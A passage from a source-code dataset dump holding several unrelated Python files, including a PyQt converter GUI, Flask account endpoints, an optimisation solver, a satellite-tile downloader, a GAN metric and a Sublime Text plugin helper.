trainer.test_loop(ep, envmodel)\n\t\tep_train_losses.append(train_loss)\n\t\tep_test_losses.append(test_loss)\n\t\tenvmodel.network.schedule(test_loss)\n\t\tif ep_test_losses[-1] <= np.min(ep_test_losses): envmodel.network.save_model(checkpoint)\n\t\tlogger.log(f\"Step: {ep:7d}, Reward: {ep_test_losses[-1]:9.3f} [{ep_train_losses[-1]:8.3f}], Avg: {np.mean(ep_test_losses, axis=0):9.3f} ({1.0:.3f})\", envmodel.network.get_stats())\n\ndef parse_args(envs, models, envmodels):\n\tparser = argparse.ArgumentParser(description=\"MDRNN Trainer\")\n\tparser.add_argument(\"env_name\", type=str, choices=envs, help=\"Name of the environment to use. Allowed values are:\\n\"+', '.join(envs), metavar=\"env_name\")\n\tparser.add_argument(\"envmodel\", type=str, default=None, choices=envmodels, help=\"Which model to use as the dynamics. Allowed values are:\\n\"+', '.join(envmodels), metavar=\"envmodels\")\n\tparser.add_argument(\"--model\", type=str, default=None, choices=models, help=\"Which RL algorithm to use as the agent. Allowed values are:\\n\"+', '.join(models), metavar=\"model\")\n\tparser.add_argument(\"--nworkers\", type=int, default=0, help=\"Number of workers to use to load dataloader\")\n\tparser.add_argument(\"--epochs\", type=int, default=50, help=\"Number of epochs to train the envmodel\")\n\tparser.add_argument(\"--seq_len\", type=int, default=40, help=\"Length of sequence to train RNN\")\n\tparser.add_argument(\"--batch_size\", type=int, default=256, help=\"Size of batch to train RNN\")\n\tparser.add_argument(\"--train_prop\", type=float, default=0.9, help=\"Proportion of trajectories to use for training\")\n\treturn parser.parse_args()\n\nif __name__ == \"__main__\":\n\targs = parse_args(all_envs, list(all_models.values())[0].keys(), all_envmodels)\n\tmake_env, _, config = get_config(args.env_name, args.model)\n\tconfig.update(**args.__dict__)\n\ttrain(make_env=make_env, config=config)\n\t\t","sub_path":"train_envmodel.py","file_name":"train_envmodel.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"54185913","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'gbrva'\n\nfrom convert import *\nfrom interface import *\nimport sys\nimport os\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QIcon\n\n# Build number\nnumBuild = '01_210915'\n\n\nclass MyWin(QtWidgets.QMainWindow):\n    mdlFlag = True\n\n    def __init__(self, parent=None):\n        QtWidgets.QWidget.__init__(self, parent)\n        self.setWindowIcon(QIcon('main.ico'))\n        self.ui = Ui_Main()\n        self.ui.setupUi(self)\n\n\n        # Set initial values\n        self.ui.pushButton.setEnabled(False)\n        self.ui.progressBar.setProperty('value', 0)\n\n        # Connect slots\n        self.ui.pushButton.clicked.connect(self.do_convert)\n        self.ui.toolButton.clicked.connect(self.do_selectfile)\n        self.ui.MoodleBtn.clicked.connect(self.do_moodleClick)\n        self.ui.TextBtn.clicked.connect(self.do_textClick)\n\n    def do_moodleClick(self):\n        
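# Editor's note (added comment): 'Moodle' mode keeps the photo checkbox usable, while do_textClick below disables it.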
self.ui.MoodleBox.setChecked(True)\n        self.ui.FotoBox.setChecked(False)\n        self.ui.FotoBox.setEnabled(True)\n        self.ui.GoogleBox.setChecked(False)\n        return None\n\n    def do_textClick(self):\n        self.ui.MoodleBox.setChecked(True)\n        self.ui.FotoBox.setChecked(False)\n        self.ui.FotoBox.setEnabled(False)\n        self.ui.GoogleBox.setChecked(False)\n\n        pass\n\n    def do_selectfile(self):\n        fname = QtWidgets.QFileDialog.getOpenFileName()[0]\n        self.ui.lineEdit.setText(str(fname))\n        if fname != '':\n            self.ui.pushButton.setEnabled(True)\n        return None\n\n    def do_convert(self):\n        frname = self.ui.lineEdit.text()\n        tmpname = os.path.split(frname)\n        fwname = os.path.join(tmpname[0], 'mdl_' + tmpname[1])\n        self.ui.outlabel.setText('Output file: ' + fwname)\n        if self.ui.MoodleBtn.isChecked():\n            Convert_1c(frname, fwname, self.ui.FotoBox.isChecked())\n        else:\n            Convert_Text(frname, fwname)\n        # self.ui.progressBar.setProperty('value', newvalue)\n        self.ui.lineEdit.setText('')\n        self.ui.pushButton.setEnabled(False)\n        return None\n\n\nif __name__ == \"__main__\":\n    app = QtWidgets.QApplication(sys.argv)\n    myapp = MyWin()\n    myapp.show()\n    sys.exit(app.exec_())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"502952583","text":"# -*- encoding: utf-8 -*-\r\nfrom flask import Blueprint\r\nfrom flask import jsonify\r\nfrom flask import request\r\nfrom flask_login import current_user\r\nfrom flask_login import login_required\r\nfrom sqlalchemy import func\r\n\r\nfrom lazyblacksmith.models import SolarSystem\r\nfrom lazyblacksmith.models import TokenScope\r\nfrom lazyblacksmith.models import db\r\n\r\nfrom . import logger\r\n\r\najax_account = Blueprint('ajax_account', __name__)\r\n\r\n\r\n@ajax_account.route('/scopes/<int:character_id>/<scope>/', methods=['DELETE'])\r\n@login_required\r\ndef delete_scope(character_id, scope):\r\n    \"\"\" Remove a scope for a given character_id from the database \"\"\"\r\n    if request.is_xhr:\r\n        allowed_character_id = [\r\n            alt.character_id for alt in current_user.alts_characters.all()\r\n        ]\r\n        if (character_id == current_user.character_id or\r\n                character_id in allowed_character_id):\r\n            try:\r\n                TokenScope.query.filter(\r\n                    TokenScope.user_id == character_id,\r\n                    TokenScope.scope == scope\r\n                ).delete()\r\n                db.session.commit()\r\n                return jsonify({'status': 'success'})\r\n\r\n            except:\r\n                logger.exception('Cannot delete scope %s for user_id %s' % (\r\n                    scope,\r\n                    character_id,\r\n                ))\r\n                db.session.rollback()\r\n                response = jsonify({\r\n                    'status': 'error',\r\n                    'message': 'Error while trying to delete scope'\r\n                })\r\n                response.status_code = 500\r\n                return response\r\n        else:\r\n            response = jsonify({\r\n                'status': 'error',\r\n                'message': 'This character does not belong to you'\r\n            })\r\n            response.status_code = 500\r\n            return response\r\n    else:\r\n        return 'Cannot call this page directly', 403\r\n\r\n\r\n@ajax_account.route('/user_preference/', methods=['POST'])\r\n@login_required\r\ndef update_user_industry_preference():\r\n    \"\"\" Update the user preferences for industry \"\"\"\r\n    if request.is_xhr:\r\n        preferences = request.get_json()\r\n\r\n        if 'production' in preferences:\r\n            return update_production_preference(preferences['production'])\r\n\r\n        if 'research' in preferences:\r\n            return update_research_preference(preferences['research'])\r\n\r\n        if 'invention' in preferences:\r\n            return update_invention_preference(preferences['invention'])\r\n    else:\r\n        return 'Cannot call 
this page directly', 403\r\n\r\n\r\ndef update_production_preference(preferences):\r\n \"\"\" Called by update_user_industry_preference, update the production\r\n preferences \"\"\"\r\n if preferences:\r\n pref = current_user.pref\r\n\r\n try:\r\n pref.prod_facility = preferences['facility']\r\n pref.prod_me_rig = preferences['meRig']\r\n pref.prod_te_rig = preferences['teRig']\r\n pref.prod_security = preferences['security']\r\n pref.prod_system = check_solar_system(preferences['system'])\r\n pref.prod_sub_facility = preferences['componentFacility']\r\n pref.prod_sub_me_rig = preferences['componentMeRig']\r\n pref.prod_sub_te_rig = preferences['componentTeRig']\r\n pref.prod_sub_security = preferences['componentSecurity']\r\n pref.prod_sub_system = check_solar_system(preferences['componentSystem'])\r\n pref.prod_price_region_minerals = preferences['priceMineralRegion']\r\n pref.prod_price_type_minerals = preferences['priceMineralType']\r\n pref.prod_price_region_pi = preferences['pricePiRegion']\r\n pref.prod_price_type_pi = preferences['pricePiType']\r\n pref.prod_price_region_moongoo = preferences['priceMoongooRegion']\r\n pref.prod_price_type_moongoo = preferences['priceMoongooType']\r\n pref.prod_price_region_others = preferences['priceOtherRegion']\r\n pref.prod_price_type_others = preferences['priceOtherType']\r\n pref.prod_character_id = preferences['characterId']\r\n\r\n db.session.commit()\r\n return jsonify({'status': 'success'})\r\n\r\n except:\r\n logger.exception('Cannot update preferences')\r\n db.session.rollback()\r\n response = jsonify({\r\n 'status': 'error',\r\n 'message': 'Error while updating preferences'\r\n })\r\n response.status_code = 500\r\n return response\r\n else:\r\n response = jsonify({\r\n 'status': 'error',\r\n 'message': 'Error: preferences are empty'\r\n })\r\n response.status_code = 500\r\n return response\r\n\r\n\r\ndef update_invention_preference(preferences):\r\n \"\"\" Called by update_user_industry_preference, update the invention\r\n preferences \"\"\"\r\n if preferences:\r\n pref = current_user.pref\r\n\r\n try:\r\n pref.invention_facility = preferences['facility']\r\n pref.invention_invention_rig = preferences['inventionRig']\r\n pref.invention_copy_rig = preferences['copyRig']\r\n pref.invention_security = preferences['security']\r\n pref.invention_system = check_solar_system(preferences['system'])\r\n pref.invention_price_region = preferences['priceRegion']\r\n pref.invention_price_type = preferences['priceType']\r\n pref.invention_character_id = preferences['characterId']\r\n\r\n db.session.commit()\r\n return jsonify({'status': 'success'})\r\n\r\n except:\r\n logger.exception('Cannot update preferences')\r\n db.session.rollback()\r\n response = jsonify({\r\n 'status': 'error',\r\n 'message': 'Error while updating preferences'\r\n })\r\n response.status_code = 500\r\n return response\r\n else:\r\n response = jsonify({\r\n 'status': 'error',\r\n 'message': 'Error: preferences are empty'\r\n })\r\n response.status_code = 500\r\n return response\r\n\r\n\r\ndef update_research_preference(preferences):\r\n \"\"\" Called by update_user_industry_preference, update the research\r\n preferences \"\"\"\r\n if preferences:\r\n pref = current_user.pref\r\n\r\n try:\r\n pref.research_facility = preferences['facility']\r\n pref.research_me_rig = preferences['meRig']\r\n pref.research_te_rig = preferences['teRig']\r\n pref.research_copy_rig = preferences['copyRig']\r\n pref.research_security = preferences['security']\r\n pref.research_system = 
check_solar_system(preferences['system'])\r\n pref.research_character_id = preferences['characterId']\r\n\r\n db.session.commit()\r\n return jsonify({'status': 'success'})\r\n\r\n except:\r\n logger.exception('Cannot update preferences')\r\n db.session.rollback()\r\n response = jsonify({\r\n 'status': 'error',\r\n 'message': 'Error while updating preferences'\r\n })\r\n response.status_code = 500\r\n return response\r\n else:\r\n response = jsonify({\r\n 'status': 'error',\r\n 'message': 'Error: preferences are empty'\r\n })\r\n response.status_code = 500\r\n return response\r\n\r\n \r\ndef check_solar_system(system_name):\r\n \"\"\" Check if a solarsystem exists and return the real name from database\r\n (prevents lower/upper case issues) \"\"\"\r\n system = SolarSystem.query.filter(\r\n func.lower(SolarSystem.name) == func.lower(system_name)\r\n ).one_or_none()\r\n return 'Jita' if not system else system.name\r\n ","sub_path":"lazyblacksmith/views/ajax/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":7768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"57058686","text":"#!/usr/bin/env python\nfrom optparse import OptionParser\nimport numpy as np\nimport itertools\nimport matplotlib.pyplot as plt\nimport scipy\nimport scipy.special\nimport sys\nimport matplotlib\nimport scipy.optimize as optimize\nfrom functools import partial\nimport json\n\n# GLOBALS\n\nPARAMETER_P = 2\nPARAMETER_ALPHA = 0.9\nPARAMETER_BETA = 10\nPARAMETER_MULT = 10\nPARAMETER_EPSILON = 0.001\nPARAMETER_PENALTY = 10.0\nPARAMETER_SUM = 0\nPARAMETER_MUL = 6\nRESULT_ITERCOUNT = 0\nRESULT_FUNCTION = 0\nRESULT_POINT = None\nPARAMETER_SRC = \"INPUT\"\nVAR_COUNT = 9\n\n#GLOBALS END\n\ndef linear_combination(c, x):\n return (c.flatten()*x.flatten()).sum()\n\ndef stohastic_programming_function(alpha, a, sigma, b, start, x):\n return b - (linear_combination(a, x) +\n scipy.special.erfinv(alpha) * (((sigma ** 2) * (x**2)).sum() ** 0.5));\n\ndef linear_combination_minus_number(c, b, x):\n return (x * c).sum() - b\n\ndef generate_functions(alpha, S, table, b, d):\n m, n, k = table.shape\n xij = \"%s_{%d%d}\"\n pattern = \"%.2f%s\"\n x_template = \"x\"\n arguments_length = int(n / S * m)\n length = int(n / S)\n fp = open(\"MATRIX_IN\", \"w\")\n fp.write(\"%d %d %d\\n\" % (m, n, S))\n for row in range(m):\n for k_ in range(S):\n a, sigma = np.zeros(arguments_length), np.zeros(arguments_length)\n coefs = table[row, k_::S]\n za = [(i + j) / 2.0 for i,j in coefs ]\n zsigma = [((i - j)**2) / 12.0 for i,j in coefs ]\n for i, pair in enumerate(zip(za, zsigma)):\n a[row * length + i ] = pair[0]\n sigma[row*length + i] = pair[1]\n\n line = \" \".join( str(i) for i in itertools.chain(a, sigma))\n fp.write(\"%s %d\\n\" % (line, b[row * 2 + k_]))\n yield partial(stohastic_programming_function,\n alpha, a, sigma, b[row * 2 + k_], row)\n fp.close()\n for row in range(m):\n coeficients = np.zeros(arguments_length)\n ones = np.ones(length)\n for i, pair in enumerate(ones):\n coeficients[row * length + i ] = pair\n yield partial(linear_combination_minus_number, coeficients, d[row]) \n\n for i in range(arguments_length):\n yield partial(lambda i, x: x[i], i)\n\n\ndef data():\n global VAR_COUNT\n ALPHA = PARAMETER_ALPHA\n fp = open(PARAMETER_SRC)\n rows_count = int(fp.readline())\n table = []\n k = 0\n \n for line in fp:\n stripped = line.strip()\n data = [float(i) for i in stripped.split(\" \")]\n table.append([]) \n for i in range(0, len(data), 2): \n 
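# Editor's note (added comment): values arrive as (low, high) pairs; generate_functions later turns each pair into the mean (low+high)/2 and variance (high-low)^2/12 of a uniform distribution on that interval.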
table[k].append((data[i], data[i + 1]))\n k += 1\n if k == rows_count:\n break\n line = fp.readline().strip(\" \")\n line2 = fp.readline().strip(\" \")\n line3 = fp.readline().strip(\" \")\n table = np.array(table)\n c_mult = 1\n m = PARAMETER_SUM\n d = np.array([float(i) for i in line.split(\" \")]) + m\n c = np.array([float(i) for i in line2.split(\" \")]).flatten() * c_mult\n b = np.array([float(i) for i in line3.split(\" \")]) * PARAMETER_MUL\n VAR_COUNT = len(c)\n S = 2\n fp.close()\n return ALPHA, S, table, c, d, b\n\n\ndef get_data(alphs, s, table, c, d, b):\n needle = partial(linear_combination, c)\n functions = list(generate_functions(alphs, s, table, b, d))\n return needle, functions\n\n\ndef default_penalty_function(g):\n return lambda x: max(0, -g(x))**PARAMETER_P\n \n\ndef alpha_function(restrictions, penalty_function=default_penalty_function):\n return lambda x: sum(default_penalty_function(f)(x) for f in restrictions)\n\n\ndef composition(functions, reducer=sum):\n return lambda x0: reducer(foo(x0) for foo in functions)\n\n\ndef penalty_optimize_step(needle, alpha, penalty, x0):\n foo = lambda x: needle(x) + penalty * alpha(x)\n return optimize.minimize(foo, x0, method='Nelder-Mead', options={\"maxiter\": 100000, \"maxfev\": 100000}), foo\n \n\ndef penalty_optimize(needle_function, restrictions, x0, beta=2.0, epsilon=0.00001, penalty=1):\n cols_n = len(x0)\n x0 = np.array(x0)\n alpha = alpha_function(restrictions)\n fit, penalty_function = penalty_optimize_step(needle_function, alpha, penalty, x0)\n iterations_count = 1\n while alpha(fit.x) * penalty > epsilon:\n fit, penalty_function = penalty_optimize_step(needle_function, alpha, penalty, [int(max(0, x)) for x in fit.x])\n penalty *= beta\n iterations_count += 1\n global RESULT_ITERCOUNT, RESULT_POINT, RESULT_FUNCTION\n RESULT_ITERCOUNT = iterations_count\n RESULT_POINT = np.array([int(x) for x in fit.x])\n RESULT_FUNCTION = needle_function(RESULT_POINT)\n return fit, penalty_function, alpha\n\n\ndef main(args):\n #global PARAMETER_P\n #PARAMETER_P = 2#float(input())\n in_data = data()\n needle, functions = get_data(*in_data)\n x0 = np.zeros(VAR_COUNT) \n fit, foo, alpha = penalty_optimize(needle, functions, x0, epsilon=PARAMETER_EPSILON, penalty=PARAMETER_PENALTY, beta=PARAMETER_BETA)\n res = np.array([int(x) for x in fit.x])\n\n\ndef prepare_globals(options):\n global PARAMETER_SUM, PARAMETER_ALPHA, PARAMETER_BETA, PARAMETER_EPSILON, PARAMETER_PENALTY, PARAMETER_SUM, PARAMETER_MUL, PARAMETER_SRC\n if options.alpha != None:\n PARAMETER_ALPHA = float(options.alpha)\n if options.p != None:\n PARAMETER_P = float(options.p)\n if options.epsilon != None:\n PARAMETER_EPSILON =float(options.epsilon)\n if options.r != None:\n PARAMETER_PENALTY = options.r\n if options.rmultiplier != None:\n PARAMETER_MUL = options.rmultiplier\n if options.planplus != None:\n PARAMETER_SUM = options.planplus\n if options.src != None:\n PARAMETER_SRC = options.src\n\n\ndef parseOptions():\n global PARAMETER_SUM, PARAMETER_ALPHA, PARAMETER_BETA, PARAMETER_EPSILON, PARAMETER_PENALTY, PARAMETER_SUM, PARAMETER_MUL\n parser = OptionParser()\n parser.add_option(\"-s\", \"--src\", dest=\"src\", help=\"setup src for input\", metavar=\"INPUT_FILE\")\n parser.add_option(\"-p\", \"--p\", dest=\"p\", help=\"setup power for penalty-functions methods\", metavar=\"POW_PENALTY\")\n parser.add_option(\"-e\", \"--epsilon\", dest=\"epsilon\", help=\"how precise your solution would be\", metavar=\"EPSILON\")\n parser.add_option(\"-r\", \"--r\", dest=\"r\", 
help=\"value for r at penalty-functions method\", metavar=\"DEFAULT_MULTIPLIER\")\n parser.add_option(\"-b\", \"--beta\", dest=\"beta\", help=\"value for beta-multiplier for penalty_functions method\", metavar=\"BETA\")\n parser.add_option(\"-a\", \"--alpha\", dest=\"alpha\", help=\"probability\", metavar=\"ALPHA\")\n parser.add_option(\"-R\", \"--rmultiplier\", dest=\"rmultiplier\", help=\"RESOURCE-multiplier\", metavar=\"RMULTIPLIER\")\n parser.add_option(\"-P\", \"--planplus\", dest=\"planplus\", help=\"Plan-variations\", metavar=\"PLANPLUS\")\n (options, args) = parser.parse_args()\n prepare_globals(options)\n\n\nif __name__ == '__main__':\n# try:\n parseOptions()\n main([])\n encoder = json.JSONEncoder()\n data = {\"itn\": RESULT_ITERCOUNT, \"f\": RESULT_FUNCTION, \"xOpt\": list(RESULT_POINT.tolist())}\n print(encoder.encode(data))\n# except Exception as e:\n# print(\"UNSATISFIED requirements for input-file\")\n","sub_path":"python-application/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":7157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"445844054","text":"# encoding:utf-8\nimport logging\nfrom twisted.web import resource\nfrom twisted.web.server import Site\nfrom twisted.internet import reactor\nimport weixin\nimport youmi\nimport config\n\n\nclass WebSite(object):\n def __init__(self):\n self.port = None\n self.root = None\n self.reg_map = {}\n\n def register(self, path, page):\n logging.info(u'WebSite.register() path=%s', path)\n if self.root:\n self.root.putChild(path, page)\n else:\n self.reg_map[path] = page\n\n def start(self):\n self.root = resource.Resource()\n self.root.putChild(\"wx\", weixin.instance)\n self.root.putChild(\"youmi\", youmi.instance)\n for path, page in self.reg_map.iteritems():\n self.root.putChild(path, page)\n self.reg_map.clear()\n self.port = reactor.listenTCP(config.instance.web_port, Site(self.root))\n\n def stop(self):\n self.port.stopListening()\n\n\ninstance = WebSite()\n","sub_path":"gamecenter/website.py","file_name":"website.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"229376468","text":"import metrics.metrics as metrics\nimport metrics.inception_processing as inception_processing\nimport utilities.directories as directories\nimport training.config as config\nimport numpy as np\nfrom tqdm import tqdm\nimport tensorflow as tf\n\nclass DiscriminativeMetric:\n name = 'discriminative metric'\n number_of_batches_for_one_file = 4\n\n def __init__(self, discriminator):\n self.discriminator = discriminator\n\n def evaluate(self,\n session,\n generator,\n real_data,\n number_activations_in_one_metric_calculation=1024,\n number_of_activations_batches=10):\n number_of_batches = number_activations_in_one_metric_calculation // config.batch_size\n\n score_list_real = []\n score_list_fake = []\n\n progressbar_frechett_calculations = tqdm(\n range(number_of_activations_batches))\n real_logits = []\n fake_logits = []\n fake_logit_op = self.discriminator(generator.call_without_input())\n real_data = tf.reshape(real_data,\n shape=(config.batch_size, 3,\n generator.resolution,\n generator.resolution)) \n real_logit_op = self.discriminator(real_data)\n for batch in progressbar_frechett_calculations:\n for i in range(number_of_batches):\n fake_logit = session.run(fake_logit_op)\n real_logit = session.run(real_logit_op)\n fake_logits.append(fake_logit)\n 
real_logits.append(real_logit)\n\n            score_real = np.mean(np.concatenate(real_logits))\n            score_fake = np.mean(np.concatenate(fake_logits))\n            fake_logits.clear()\n            real_logits.clear() \n            print('Calculated score for real is ' + str(score_real) + ' for fake is '+ str(score_fake))\n            score_list_real.append(score_real)\n            score_list_fake.append(score_fake)\n        \n        np_scores_real = np.asarray(score_list_real)\n        np_scores_fake = np.asarray(score_list_fake)\n\n        avg_real, std_real = np.mean(np_scores_real), np.std(np_scores_real)\n        avg_fake, std_fake = np.mean(np_scores_fake), np.std(np_scores_fake)\n\n        print('real ' + self.name + ' avg: {} std: {}'.format(avg_real, std_real))\n        print('fake ' + self.name + ' avg: {} std: {}'.format(avg_fake, std_fake))\n\n        return avg_fake, std_fake\n\n    def get_name(self):\n        return self.name","sub_path":"metrics/DiscriminativeMetric.py","file_name":"DiscriminativeMetric.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"186366903","text":"\n\"\"\"\nGet satellite data tiles at various levels of detail\n\"\"\"\n\nimport urllib.request\nimport os.path\nimport subprocess\n\n#testfile = urllib.URLopener()\n#testfile.retrieve(\"http://randomsite.com/file.gz\", \"file.gz\")\n\n#lod=3\n#r=1\n#c=1\n#tilefile = urllib.URLopener()\n#with urllib.request.urlopen('http://python.org/') as response:\n#    html = response.read()\nlod=13\nyext=(120,147)\nxext=(75,99)\n\nfor r in range(*yext):\n    for c in range(*xext):\n        filename = \"rawdata/satellite/lod13/tile_r%d_c%d_lod%d.jpg\" % (r,c,lod)\n        if os.path.isfile(filename):\n            print(\"already got %s\" % filename)\n        else:\n            print(\"downloading %s\" % filename)\n            response = urllib.request.urlopen(\"http://gistiles3.arso.gov.si/nukleus_tiles/Gis/NukleusTiles/v50/AgccTile.ashx?gcid=lay_AO_DOF_2014&r=%d&c=%d&lod=%d&lid=lay_ao_dof_2014&f=jpg\" % (r,c,lod))\n            data = response.read()\n            file = open(filename, 'wb')\n            file.write(data)\n            file.close()\n\n#print (\"Reconstruct with montage 'tile_r*_c*_lod%d.jpg' -geometry +0+0 -tile %dx%d montage.jpg\" % (lod,xext[1]-xext[0],yext[1]-yext[0]))\ncommand = \"montage 'tile_r*_c*_lod%d.jpg' -geometry +0+0 -tile %dx%d montage.jpg\" % (lod,xext[1]-xext[0],yext[1]-yext[0])\nprint(\"Run this manually: \",command)\n#subprocess.run(command, shell=True)\n\n#The following have been identified as a location matching the 9th level of detail images to their physical location\n#If the yextent or xextent are changed, this point will need to be moved.\n#The top left hand corner of the tile with image coordinates 1614,4800 corresponds with the top left of the 403000,123000 1km square.\nfixedImageX=3618\nfixedImageY=3479\nwidth1kmTile=377\nfixedX=405\nfixedY=123\n\n\n\n\n## LOD 9 Calibrations:\n\n\n\n\n#The offset from GK to TM \n#tm_x_offset = 1397\n#tm_y_offset = 1805\n\n\n\n\nfor ix in range(-11,10):\n    for iy in range(-8,10):\n        command = \"convert .\\montage.jpg -crop %dx%d+%d+%d -resize 256x256 assets/satellite/96TM/256/%d_%d.jpg\" % (width1kmTile,width1kmTile,fixedImageX+ix*width1kmTile,fixedImageY+iy*width1kmTile,fixedX+ix,fixedY+1-iy)\n        print(command)\n        #subprocess.run(command, shell=True)\n\n\n\n\n\n#http://gistiles3.arso.gov.si/nukleus_tiles/Gis/NukleusTiles/v50/AgccTile.ashx?gcid=lay_AO_DOF_2014&r=1&c=1&lod=3&lid=lay_ao_dof_2014&f=jpg\n","sub_path":"src/retrieveSatelliteTiles.lod13.py","file_name":"retrieveSatelliteTiles.lod13.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"433507083","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n    url (r'signup/', views.signup, name=\"signup\"),\n    url (r'login/', views.login, name=\"login\"),\n    url (r'toll_locations/', views.locations, name=\"toll_locations\"),\n    url (r'qrgen/', views.qrgen, name=\"qrgen\"),\n    url (r'payment/', views.payment, name=\"payment\"),\n    url (r'auth/', views.auth, name=\"auth\"),\n    url (r'details/', views.userdetails, name=\"details\"),\n    url (r'payment2/', views.pay2, name=\"pay2\")\n]\n","sub_path":"rest_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"17963371","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport os\nimport sublime\nimport codecs\nimport json\nimport shutil\n\nfrom . import DeviotCommands\nfrom . import DeviotPaths\n\nclass JSONFile(object):\n\t\"\"\"Handle JSON Files\n\t\n\tThis class allows loading and saving JSON files\n\t\"\"\"\n\tdef __init__(self, path):\n\t\t\"\"\"JSONFile Construct\n\t\t\n\t\tThis constructor loads a file when called and\n\t\tstores the information in a global variable\n\t\t\n\t\tArguments:\n\t\t\tpath {string} -- Full path of the JSON file\n\t\t\"\"\"\n\t\tsuper(JSONFile, self).__init__()\t\t\n\t\tself.setEncoding()\n\t\tself.data = {}\n\t\tself.path = path\n\t\tself.loadData()\t\t\n\n\tdef loadData(self):\n\t\t\"\"\"Load JSON File\n\t\t\n\t\tLoad the content of a JSON file and \n\t\tdeserialize it to set the information \n\t\tin a global object called data\n\t\t\"\"\"\n\t\ttry:\n\t\t\ttext = self.readFile()\n\t\texcept:\n\t\t\treturn\n\t\t\t\n\t\ttry:\n\t\t\tself.data = json.loads(text)\n\t\texcept:\n\t\t\tpass\n\n\tdef getData(self):\n\t\t\"\"\"Output data\n\t\t\n\t\tIt's an alternative way to get the data obtained from\n\t\tthe JSON file. The other way is using only the \"data\"\n\t\tglobal object.\n\n\t\tReturns:\n\t\t\t{multiple} -- multiple types of data stored in the \n\t\t\t\t\t\t  different files.\n\t\t\"\"\"\n\t\treturn self.data\n\n\tdef setData(self, data):\n\t\t\"\"\"Set the JSON data\n\t\t\n\t\tSave the data in the file set in the\n\t\tconstructor. This method is mostly used in \n\t\tthe preferences class.\n\t\t\n\t\tArguments:\n\t\t\tdata {string} -- data to save in the JSON file.\n\t\t\"\"\"\n\t\tself.data = data\n\t\tself.saveData()\n\n\tdef saveData(self):\n\t\t\"\"\"Save JSON data\n\t\t\n\t\tSerialize the data stored in the global object data\n\t\tand call writeFile. This function is called automatically\n\t\twhen any data is set in the method setData.\n\t\t\n\t\t\"\"\"\n\t\ttext = json.dumps(self.data, sort_keys=True, indent=4)\n\t\tself.writeFile(text)\n\n\tdef readFile(self):\n\t\t\"\"\"Read File\n\t\t\n\t\tRead the data from the file specified in the global object path.\n\t\tThe data read is decoded with the format specified in the global\n\t\tobject encoding, by default this object is UTF-8. Use this method 
Use this method \n\t\tif you don't want to modify the data received from the file.\n\n\t\tReturns:\n\t\t\ttext {string} -- encoded text readed from file\n\t\t\"\"\"\n\t\ttext = ''\n\n\t\ttry:\n\t\t\twith codecs.open(self.path, 'r', self.encoding) as file:\n\t\t\t\ttext = file.read()\n\t\texcept (IOError, UnicodeError):\n\t\t\tpass\n\n\t\treturn text\n\n\tdef writeFile(self, text, append=False):\n\t\t\"\"\"Write File\n\t\t\n\t\tWrite the data passed in a file specified in the global object path.\n\t\tThis method is called automatically by saveData, and encode the text\n\t\tin the format specified in the global object encoding, by default this\n\t\tobject is UTF-8. Use this method if you don't want to modify the data\n\t\tto write.\n\t\t\n\t\tArguments:\n\t\t\ttext {string} -- Text to write in the file\n\t\t\n\t\tKeyword Arguments:\n\t\t\tappend {boolean} -- Set to True if you want to append the data in the file (default: False)\n\t\t\"\"\"\n\t\tmode = 'w'\n\n\t\tif append:\n\t\t\tmode = 'a'\n\t\ttry:\n\t\t\twith codecs.open(self.path, mode, self.encoding) as file:\n\t\t\t\tfile.write(text)\n\t\texcept (IOError, UnicodeError):\n\t\t\tpass\n\n\tdef setEncoding(self, encoding='utf-8'):\n\t\t\"\"\"Change encoding\n\t\t\n\t\tCall this method to change the format to encode the files when you \n\t\tload it or save it.\n\t\t\n\t\tKeyword Arguments:\n\t\t\tencoding {string} -- Format to encoding (default: UTF-8 )\n\t\t\"\"\"\n\t\tself.encoding = encoding\n\nclass Menu(object):\n\t\"\"\"Plugin Menu\n\t\n\tClass to handle the differents option in the plugin menu.\n\t\"\"\"\n\tdef __init__(self):\n\t\t\"\"\"Construct\n\t\t\n\t\tCall the construct of the command library to make the\n\t\tdifferents call by CLI\n\t\t\"\"\"\n\t\tsuper(Menu, self).__init__()\n\t\tself.Command = DeviotCommands.CommandsPy()\n\n\tdef saveAPIBoards(self):\n\t\t\"\"\"Save board list\n\t\t\n\t\tSave the JSON object in a specific JSON file\n\t\t\"\"\"\n\t\tboards = PlatformioCLI().getAPIBoards()\n\n\t\tfile = JSONFile(DeviotPaths.getDeviotBoardsPath())\n\t\tfile.setData(boards)\n\t\tfile.saveData()\n\n\tdef getFileBoards(self):\n\t\t\"\"\"Get Board File\n\t\t\n\t\tLoad the board list stored in a JSON file and \n\t\treturn the data. This function is used to avoid\n\t\talways download the list from the web.\n\n\t\tReturns:\n\t\t \t{json object} -- list with all boards in a JSON format\n\t\t\"\"\"\n\t\tfile = JSONFile(DeviotPaths.getDeviotBoardsPath())\n\t\tboards = file.getData()\n\t\treturn boards\n\n\tdef createBoardsMenu(self):\n\t\t\"\"\"Board menu\n\t\t\n\t\tLoad the JSON file with the list of all boards and re order it\n\t\tbased on the vendor. 
